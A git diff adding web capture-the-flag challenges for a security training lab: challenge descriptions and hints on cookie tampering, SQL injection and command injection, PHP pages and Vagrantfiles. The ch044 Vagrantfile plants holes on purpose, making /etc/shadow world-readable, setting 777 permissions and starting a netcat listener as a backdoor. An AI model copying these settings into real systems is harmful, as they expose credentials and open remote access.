+
+
+
+
+
diff --git a/challenges/ch041/newchallenge1.xml b/challenges/ch041/newchallenge1.xml
new file mode 100755
index 00000000..876bae82
--- /dev/null
+++ b/challenges/ch041/newchallenge1.xml
@@ -0,0 +1,20 @@
+
+
+ New Challenge 1
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.
+ ]]>
+Hints and tips :
+First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here's one : "Images can reveal way too much". All the Best, don't lose hope !!
reference_1
+
+
+
diff --git a/challenges/ch041/pwd2.php b/challenges/ch041/pwd2.php
new file mode 100755
index 00000000..82b756dd
--- /dev/null
+++ b/challenges/ch041/pwd2.php
@@ -0,0 +1,34 @@
+
+
+
+
+
+DeskTest : Funrally Axis Cube Black Base
+
+
+
+
Congratulations :D
You NAILED IT !";
+
+ die();
+ }
+
+ else
+ {
+
+ echo "
+
+
diff --git a/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png b/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png
new file mode 100755
index 00000000..25423b60
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020759_internt_web_technology-08-128.png differ
diff --git a/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png b/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png
new file mode 100755
index 00000000..51f91746
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020820_internt_web_technology-14-64.png differ
diff --git a/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png b/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png
new file mode 100755
index 00000000..bb81ab4c
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421020862_internt_web_technology-13-48.png differ
diff --git a/challenges/ch042/inside/newicons/1421021091_map-128.png b/challenges/ch042/inside/newicons/1421021091_map-128.png
new file mode 100755
index 00000000..1d47948e
Binary files /dev/null and b/challenges/ch042/inside/newicons/1421021091_map-128.png differ
diff --git a/challenges/ch042/inside/newicons/fb24_1.png b/challenges/ch042/inside/newicons/fb24_1.png
new file mode 100755
index 00000000..7a61b287
Binary files /dev/null and b/challenges/ch042/inside/newicons/fb24_1.png differ
diff --git a/challenges/ch042/inside/newicons/fb24_2.png b/challenges/ch042/inside/newicons/fb24_2.png
new file mode 100755
index 00000000..128d9a0f
Binary files /dev/null and b/challenges/ch042/inside/newicons/fb24_2.png differ
diff --git a/challenges/ch042/inside/newicons/gmail32.png b/challenges/ch042/inside/newicons/gmail32.png
new file mode 100755
index 00000000..fd70437e
Binary files /dev/null and b/challenges/ch042/inside/newicons/gmail32.png differ
diff --git a/challenges/ch042/inside/newicons/google24_2.png b/challenges/ch042/inside/newicons/google24_2.png
new file mode 100755
index 00000000..7b868772
Binary files /dev/null and b/challenges/ch042/inside/newicons/google24_2.png differ
diff --git a/challenges/ch042/inside/newicons/instagram.png b/challenges/ch042/inside/newicons/instagram.png
new file mode 100755
index 00000000..68bb1a39
Binary files /dev/null and b/challenges/ch042/inside/newicons/instagram.png differ
diff --git a/challenges/ch042/inside/newicons/linkedin24_2.png b/challenges/ch042/inside/newicons/linkedin24_2.png
new file mode 100755
index 00000000..4dc9c022
Binary files /dev/null and b/challenges/ch042/inside/newicons/linkedin24_2.png differ
diff --git a/challenges/ch042/inside/newicons/linkedin32.png b/challenges/ch042/inside/newicons/linkedin32.png
new file mode 100755
index 00000000..ea15de25
Binary files /dev/null and b/challenges/ch042/inside/newicons/linkedin32.png differ
diff --git a/challenges/ch042/inside/newicons/mail24_1.png b/challenges/ch042/inside/newicons/mail24_1.png
new file mode 100755
index 00000000..66ec95c5
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail24_1.png differ
diff --git a/challenges/ch042/inside/newicons/mail24_2.png b/challenges/ch042/inside/newicons/mail24_2.png
new file mode 100755
index 00000000..c59cac41
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail24_2.png differ
diff --git a/challenges/ch042/inside/newicons/mail64_1.png b/challenges/ch042/inside/newicons/mail64_1.png
new file mode 100755
index 00000000..d94a3416
Binary files /dev/null and b/challenges/ch042/inside/newicons/mail64_1.png differ
diff --git a/challenges/ch042/inside/newicons/place24.png b/challenges/ch042/inside/newicons/place24.png
new file mode 100755
index 00000000..721525ed
Binary files /dev/null and b/challenges/ch042/inside/newicons/place24.png differ
diff --git a/challenges/ch042/inside/newicons/place32.png b/challenges/ch042/inside/newicons/place32.png
new file mode 100755
index 00000000..87b6dee6
Binary files /dev/null and b/challenges/ch042/inside/newicons/place32.png differ
diff --git a/challenges/ch042/inside/newicons/twit.png b/challenges/ch042/inside/newicons/twit.png
new file mode 100755
index 00000000..16b88d59
Binary files /dev/null and b/challenges/ch042/inside/newicons/twit.png differ
diff --git a/challenges/ch042/inside/newicons/twitter24_2.png b/challenges/ch042/inside/newicons/twitter24_2.png
new file mode 100755
index 00000000..57c3b201
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter24_2.png differ
diff --git a/challenges/ch042/inside/newicons/twitter32.png b/challenges/ch042/inside/newicons/twitter32.png
new file mode 100755
index 00000000..14fb00c1
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter32.png differ
diff --git a/challenges/ch042/inside/newicons/twitter32_1.png b/challenges/ch042/inside/newicons/twitter32_1.png
new file mode 100755
index 00000000..0d2778f6
Binary files /dev/null and b/challenges/ch042/inside/newicons/twitter32_1.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_1.png b/challenges/ch042/inside/use-icon/fb48_1.png
new file mode 100755
index 00000000..b6bc1b76
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_2.png b/challenges/ch042/inside/use-icon/fb48_2.png
new file mode 100755
index 00000000..1b0af134
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_3.png b/challenges/ch042/inside/use-icon/fb48_3.png
new file mode 100755
index 00000000..09694e85
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/fb48_4.png b/challenges/ch042/inside/use-icon/fb48_4.png
new file mode 100755
index 00000000..89526692
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/fb_32.png b/challenges/ch042/inside/use-icon/fb_32.png
new file mode 100755
index 00000000..4be62fb2
Binary files /dev/null and b/challenges/ch042/inside/use-icon/fb_32.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48.png b/challenges/ch042/inside/use-icon/gplus48.png
new file mode 100755
index 00000000..983f1afb
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_2.png b/challenges/ch042/inside/use-icon/gplus48_2.png
new file mode 100755
index 00000000..ee2a147c
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_3.png b/challenges/ch042/inside/use-icon/gplus48_3.png
new file mode 100755
index 00000000..9cc71349
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/gplus48_4.png b/challenges/ch042/inside/use-icon/gplus48_4.png
new file mode 100755
index 00000000..549ae0ed
Binary files /dev/null and b/challenges/ch042/inside/use-icon/gplus48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_1.png b/challenges/ch042/inside/use-icon/linkedin48_1.png
new file mode 100755
index 00000000..7a8e11ac
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_2.png b/challenges/ch042/inside/use-icon/linkedin48_2.png
new file mode 100755
index 00000000..417514aa
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_3.png b/challenges/ch042/inside/use-icon/linkedin48_3.png
new file mode 100755
index 00000000..9a77eef9
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin48_4.png b/challenges/ch042/inside/use-icon/linkedin48_4.png
new file mode 100755
index 00000000..b35db457
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/linkedin_32.png b/challenges/ch042/inside/use-icon/linkedin_32.png
new file mode 100755
index 00000000..9c009a52
Binary files /dev/null and b/challenges/ch042/inside/use-icon/linkedin_32.png differ
diff --git a/challenges/ch042/inside/use-icon/mail32.png b/challenges/ch042/inside/use-icon/mail32.png
new file mode 100755
index 00000000..bf5a04fd
Binary files /dev/null and b/challenges/ch042/inside/use-icon/mail32.png differ
diff --git a/challenges/ch042/inside/use-icon/mail32_1.png b/challenges/ch042/inside/use-icon/mail32_1.png
new file mode 100755
index 00000000..e80e9b08
Binary files /dev/null and b/challenges/ch042/inside/use-icon/mail32_1.png differ
diff --git a/challenges/ch042/inside/use-icon/msg_1png b/challenges/ch042/inside/use-icon/msg_1png
new file mode 100755
index 00000000..c49221ad
Binary files /dev/null and b/challenges/ch042/inside/use-icon/msg_1png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_1.png b/challenges/ch042/inside/use-icon/twitter48_1.png
new file mode 100755
index 00000000..fa928111
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_1.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_2.png b/challenges/ch042/inside/use-icon/twitter48_2.png
new file mode 100755
index 00000000..2a560776
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_2.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_3.png b/challenges/ch042/inside/use-icon/twitter48_3.png
new file mode 100755
index 00000000..b8ab821d
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_3.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter48_4.png b/challenges/ch042/inside/use-icon/twitter48_4.png
new file mode 100755
index 00000000..0bc14d99
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter48_4.png differ
diff --git a/challenges/ch042/inside/use-icon/twitter_32.png b/challenges/ch042/inside/use-icon/twitter_32.png
new file mode 100755
index 00000000..bbcc2cc2
Binary files /dev/null and b/challenges/ch042/inside/use-icon/twitter_32.png differ
diff --git a/challenges/ch042/inside/use-icons/facebook.png b/challenges/ch042/inside/use-icons/facebook.png
new file mode 100755
index 00000000..5fb0213b
Binary files /dev/null and b/challenges/ch042/inside/use-icons/facebook.png differ
diff --git a/challenges/ch042/inside/use-icons/google.png b/challenges/ch042/inside/use-icons/google.png
new file mode 100755
index 00000000..2942c7ea
Binary files /dev/null and b/challenges/ch042/inside/use-icons/google.png differ
diff --git a/challenges/ch042/inside/use-icons/linkedin.png b/challenges/ch042/inside/use-icons/linkedin.png
new file mode 100755
index 00000000..ba6a753b
Binary files /dev/null and b/challenges/ch042/inside/use-icons/linkedin.png differ
diff --git a/challenges/ch042/inside/use-icons/submit.png b/challenges/ch042/inside/use-icons/submit.png
new file mode 100755
index 00000000..7e35d6d5
Binary files /dev/null and b/challenges/ch042/inside/use-icons/submit.png differ
diff --git a/challenges/ch042/inside/use-icons/submit_check.png b/challenges/ch042/inside/use-icons/submit_check.png
new file mode 100755
index 00000000..d8da4735
Binary files /dev/null and b/challenges/ch042/inside/use-icons/submit_check.png differ
diff --git a/challenges/ch042/inside/use-icons/twitter.png b/challenges/ch042/inside/use-icons/twitter.png
new file mode 100755
index 00000000..9b81a0d6
Binary files /dev/null and b/challenges/ch042/inside/use-icons/twitter.png differ
diff --git a/challenges/ch042/newchallenge2.xml b/challenges/ch042/newchallenge2.xml
new file mode 100755
index 00000000..07bb83cc
--- /dev/null
+++ b/challenges/ch042/newchallenge2.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 2
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, they have solved this to an extent and have MITM'd a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn't enough to get to the user's profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.
+
+Hints and Tips :
+You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup'd. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You're LOGGED in (atleast as a user). Here's another : Wanna have a Cookie ??
+
+
diff --git a/challenges/ch042/setup_db/sql-connect.php b/challenges/ch042/setup_db/sql-connect.php
new file mode 100755
index 00000000..33b15d2c
--- /dev/null
+++ b/challenges/ch042/setup_db/sql-connect.php
@@ -0,0 +1,19 @@
+
+
+
+
+
+
diff --git a/challenges/ch043/Vagrantfile b/challenges/ch043/Vagrantfile
new file mode 100755
index 00000000..3eef6ac9
--- /dev/null
+++ b/challenges/ch043/Vagrantfile
@@ -0,0 +1,91 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ config.vm.provision "shell",
+ inline: "sudo php /var/www/html/setup_db/setup-db.php"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+ #print "almost done\n";
+ #config.vm.provision "shell",
+ # inline: "sudo php /var/www/html/sql-connections/setup-db.php"
+ #config.vm.provision "shell",
+ # inline: "sudo service apache2 restart && sudo service mysql restart"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch043/images/back.jpg b/challenges/ch043/images/back.jpg
new file mode 100755
index 00000000..f8d1922f
Binary files /dev/null and b/challenges/ch043/images/back.jpg differ
diff --git a/challenges/ch043/images/back1.jpg b/challenges/ch043/images/back1.jpg
new file mode 100755
index 00000000..bcef5dc6
Binary files /dev/null and b/challenges/ch043/images/back1.jpg differ
diff --git a/challenges/ch043/images/happy.jpg b/challenges/ch043/images/happy.jpg
new file mode 100755
index 00000000..6067ec95
Binary files /dev/null and b/challenges/ch043/images/happy.jpg differ
diff --git a/challenges/ch043/images/images.jpeg b/challenges/ch043/images/images.jpeg
new file mode 100755
index 00000000..41a0560f
Binary files /dev/null and b/challenges/ch043/images/images.jpeg differ
diff --git a/challenges/ch043/images/sad.jpg b/challenges/ch043/images/sad.jpg
new file mode 100755
index 00000000..3f4b0183
Binary files /dev/null and b/challenges/ch043/images/sad.jpg differ
diff --git a/challenges/ch043/images/wow.jpg b/challenges/ch043/images/wow.jpg
new file mode 100755
index 00000000..bd73a084
Binary files /dev/null and b/challenges/ch043/images/wow.jpg differ
diff --git a/challenges/ch043/index.php b/challenges/ch043/index.php
new file mode 100755
index 00000000..523fc245
--- /dev/null
+++ b/challenges/ch043/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch043/inside/just_admin.php b/challenges/ch043/inside/just_admin.php
new file mode 100755
index 00000000..03ff6c5a
--- /dev/null
+++ b/challenges/ch043/inside/just_admin.php
@@ -0,0 +1,97 @@
+
+
+
+
+JUST GO
+
+
+
diff --git a/challenges/ch043/newchallenge3.xml b/challenges/ch043/newchallenge3.xml
new file mode 100755
index 00000000..adb51b1c
--- /dev/null
+++ b/challenges/ch043/newchallenge3.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn't even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
Hint : You're Logged in
+
+Hints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. reference1reference2
+
+
diff --git a/challenges/ch043/setup_db/sql-connect.php b/challenges/ch043/setup_db/sql-connect.php
new file mode 100755
index 00000000..0bd8ba15
--- /dev/null
+++ b/challenges/ch043/setup_db/sql-connect.php
@@ -0,0 +1,19 @@
+
+
+
+
+
+
diff --git a/challenges/ch044/Vagrantfile b/challenges/ch044/Vagrantfile
new file mode 100755
index 00000000..69eecce2
--- /dev/null
+++ b/challenges/ch044/Vagrantfile
@@ -0,0 +1,92 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo apt-get install whatweb -y"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod 644 /etc/shadow"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql start"
+ config.vm.provision "shell",
+ inline: "sudo nc -l 1337 &"
+ # config.vm.provision "shell",
+ # inline: "sudo chmod 555 /var/www/html/inside/.log_in.php"
+ config.vm.provision "shell",
+ inline: "chmod 111 /var/www/html/inside/.log\\'in.php"
+ # inline: "chmod 111 .log\'in.php"
+
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
+ # Share an additional folder to the guest VM. The first argument is
+ # the path on the host to the actual folder. The second argument is
+ # the path on the guest to mount the folder. And the optional third
+ # argument is a set of non-required options.
+ # config.vm.synced_folder "../data", "/vagrant_data"
+
+ # Provider-specific configuration so you can fine-tune various
+ # backing providers for Vagrant. These expose provider-specific options.
+ # Example for VirtualBox:
+ #
+ # config.vm.provider "virtualbox" do |vb|
+ # # Display the VirtualBox GUI when booting the machine
+ # vb.gui = true
+ #
+ # # Customize the amount of memory on the VM:
+ # vb.memory = "1024"
+ # end
+ #
+ # View the documentation for the provider you are using for more
+ # information on available options.
+
+ # Define a Vagrant Push strategy for pushing to Atlas. Other push strategies
+ # such as FTP and Heroku are also available. See the documentation at
+ # https://docs.vagrantup.com/v2/push/atlas.html for more information.
+ # config.push.define "atlas" do |push|
+ # push.app = "YOUR_ATLAS_USERNAME/YOUR_APPLICATION_NAME"
+ # end
+
+ # Enable provisioning with a shell script. Additional provisioners such as
+ # Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+ # documentation for more information about their specific syntax and use.
+ # config.vm.provision "shell", inline: <<-SHELL
+ # sudo apt-get update
+ # sudo apt-get install -y apache2
+ # SHELL
+end
diff --git a/challenges/ch044/index.php b/challenges/ch044/index.php
new file mode 100755
index 00000000..8413b845
--- /dev/null
+++ b/challenges/ch044/index.php
@@ -0,0 +1,5 @@
+
diff --git a/challenges/ch044/inside/.log'in.php b/challenges/ch044/inside/.log'in.php
new file mode 100755
index 00000000..c8b4281e
--- /dev/null
+++ b/challenges/ch044/inside/.log'in.php
@@ -0,0 +1,79 @@
+
+
+
+
+
+
+
+
+Shell
+
+
+
+
Software: Apache/2.2.11 (Unix). PHP/4.4.9
uname -a: Linux trytohack 2.6.9-1.667smp #1 SMP Tue Nov 2 14:59:52 EST 2004 i686
Disabled functions: NONE
cURL: OFFRegister globals: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
+WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.
";
+ //echo $html;
+}
+
+?>
diff --git a/challenges/ch044/inside/l7s.png b/challenges/ch044/inside/l7s.png
new file mode 100755
index 00000000..776b58d1
Binary files /dev/null and b/challenges/ch044/inside/l7s.png differ
diff --git a/challenges/ch044/inside/watt.jpg b/challenges/ch044/inside/watt.jpg
new file mode 100755
index 00000000..dc41e38d
Binary files /dev/null and b/challenges/ch044/inside/watt.jpg differ
diff --git a/challenges/ch044/inside/watweb.jpg b/challenges/ch044/inside/watweb.jpg
new file mode 100755
index 00000000..18b61658
Binary files /dev/null and b/challenges/ch044/inside/watweb.jpg differ
diff --git a/challenges/ch044/inside/whatweb-heading.jpg b/challenges/ch044/inside/whatweb-heading.jpg
new file mode 100755
index 00000000..43b1cfb6
Binary files /dev/null and b/challenges/ch044/inside/whatweb-heading.jpg differ
diff --git a/challenges/ch044/inside/whatweb.css b/challenges/ch044/inside/whatweb.css
new file mode 100755
index 00000000..2138e56d
--- /dev/null
+++ b/challenges/ch044/inside/whatweb.css
@@ -0,0 +1,116 @@
+* {
+ margin:0;
+ padding: 0;
+}
+html,body {
+ font: 1em "arial", "sans-serif";
+ background-color:#eeeeee;
+}
+h1,h2,h3 {
+ background-color:#fefefe;
+ padding-left: 20px;
+ border:1px solid #cccccc;
+ font-size:0.8em;
+ text-align:left;
+ font-weight:none;
+}
+p, blockquote {
+ margin:15px;
+ font-size: 0.8em;
+ padding:15px;
+}
+ul {
+ margin:15px;
+ padding:15px;
+ list-style-type: none;
+ text-align:left;
+}
+input {
+ border:1px solid #cccccc;
+}
+input:hover {
+ background-color:#eeeeee;
+}
+a:link {
+ color:#2580a2;
+}
+a:active, a:visited {
+ color: #2580a2;
+}
+a:hover {
+ color: #f90;
+}
+img {
+ border:0;
+}
+#loading_img {
+ position:relative;
+ display:block;
+ visibility:hidden;
+ width:16px;
+ height:16px;
+ border:0;
+}
+#form {
+ float: right;
+ padding:15px;
+ margin:15px;
+ width: 40%;
+ overflow: auto;
+}
+#description {
+ float: left;
+ width: 40%;
+ overflow: auto;
+}
+#whatweb {
+ text-align: left;
+ display:block;
+ display:none;
+ font-size:medium;
+ padding:15px;
+ margin:15px;
+ width:970px;
+ border:1px solid #dddddd;
+ overflow: auto;
+}
+#whatweb:hover {
+ background-color:#fefefe;
+}
+#footer {
+ background-color:#eeeeee;
+ border:1px solid #cccccc;
+ margin: 0px auto -1px auto;
+ height:10px;
+ text-align:center;
+ font-size:0.7em;
+}
+#footer:hover {
+ background-color:#fefefe;
+}
+#container {
+ background-color:#ffffff;
+ border:1px solid #cccccc;
+ margin: 0px auto -1px auto;
+ width:730px;
+ height:600px;
+ text-align:left;
+}
+#header {
+ background-color:#eeeeee;
+ margin: 0px auto -1px auto;
+ width:730px;
+ height:160px;
+ text-align:center;
+}
+.smalltext {
+ font-size:0.7em;
+}
+.icon {
+ height: 32px;
+ width: 32px;
+ float: left;
+ margin: 0;
+ padding: 0;
+ margin-right: 30px;
+}
diff --git a/challenges/ch044/inside/wiki.png b/challenges/ch044/inside/wiki.png
new file mode 100755
index 00000000..af3b5627
Binary files /dev/null and b/challenges/ch044/inside/wiki.png differ
diff --git a/challenges/ch044/newchallenge4.xml b/challenges/ch044/newchallenge4.xml
new file mode 100755
index 00000000..e499ecc1
--- /dev/null
+++ b/challenges/ch044/newchallenge4.xml
@@ -0,0 +1,21 @@
+
+
+ New Challenge 3
+
+ Andreas Venieris,
+ Konstantinos Papapanagiotou,
+ Anastasios Stasinopoulos,
+ Vasilios Vlachos,
+ Alexandros Papanikolaou
+
+ web
+
+ blacklist there is a very-minute mistake which all lead to this attack, crack that to get into the web-server and to get sudo credentials of hacker's system which is as defined : "login page" [the hacker's sudo page] is somewhere hidden on the main webpage, this trick works quite sometimes but is a bad habit for web-developers hiding a link. The hacker being assaulted gives hint for his system's su password, "you'll get the login crendentials with the services and port of the backdoor, username is "root" and password is the concatenation of these three words [the hackers speak for the corresponding port number] + [the service running] + [sudo password from the etc/passwd file, shadow crack]". Now, it's time for you to work on, All the Best !
+
+Hints /Tips & Rules :
+You are not allowed to view the source-code of php files (using cat or some other services) , after getting into the web-server system [to kinda make this more challenging]. First check out how the website works by varying different inputs, next go through the blacklist file which with some modifications would allow you to execute commands on the web-server system. You might have to change permissions of files. reference1
+]]>
+
+
+
diff --git a/challenges/ch045/Vagrantfile b/challenges/ch045/Vagrantfile
new file mode 100755
index 00000000..dc398a54
--- /dev/null
+++ b/challenges/ch045/Vagrantfile
@@ -0,0 +1,86 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# All Vagrant configuration is done below. The "2" in Vagrant.configure
+# configures the configuration version (we support older styles for
+# backwards compatibility). Please don't change it unless you know what
+# you're doing.
+Vagrant.configure(2) do |config|
+ # The most common configuration options are documented and commented below.
+ # For a complete reference, please see the online documentation at
+ # https://docs.vagrantup.com.
+
+ # Every Vagrant development environment requires a box. You can search for
+ # boxes at https://atlas.hashicorp.com/search.
+ config.vm.box = "waratek/kali-mini"
+
+ # Disable automatic box update checking. If you disable this, then
+ # boxes will only be checked for updates when the user runs
+ # `vagrant box outdated`. This is not recommended.
+ # config.vm.box_check_update = false
+
+ # Create a forwarded port mapping which allows access to a specific port
+ # within the machine from a port on the host machine. In the example below,
+ # accessing "localhost:8080" will access port 80 on the guest machine.
+ config.vm.network "forwarded_port", guest: 80, host: 8008
+
+ config.vm.provision "shell",
+ inline: "sudo rm -rf /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo ln -s /vagrant /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo chmod -R 777 /var/www/html"
+ config.vm.provision "shell",
+ inline: "sudo service mysql start"
+ #config.vm.provision "shell",
+ # inline: "sudo /usr/bin/mysql -uroot -pnewpassword -e 'SELECT CURDATE();' || /usr/bin/mysqladmin -u root password 'newpassword'"
+ config.vm.provision "shell",
+ inline: "sudo service apache2 start && sudo service mysql restart"
+ config.vm.provision "shell",
+ inline: "sudo php /var/www/html/setup_db/setup-db.php"
+
+ # Create a private network, which allows host-only access to the machine
+ # using a specific IP.
+ # config.vm.network "private_network", ip: "192.168.33.10"
+
+ # Create a public network, which generally matched to bridged network.
+ # Bridged networks make the machine appear as another physical device on
+ # your network.
+ # config.vm.network "public_network"
+
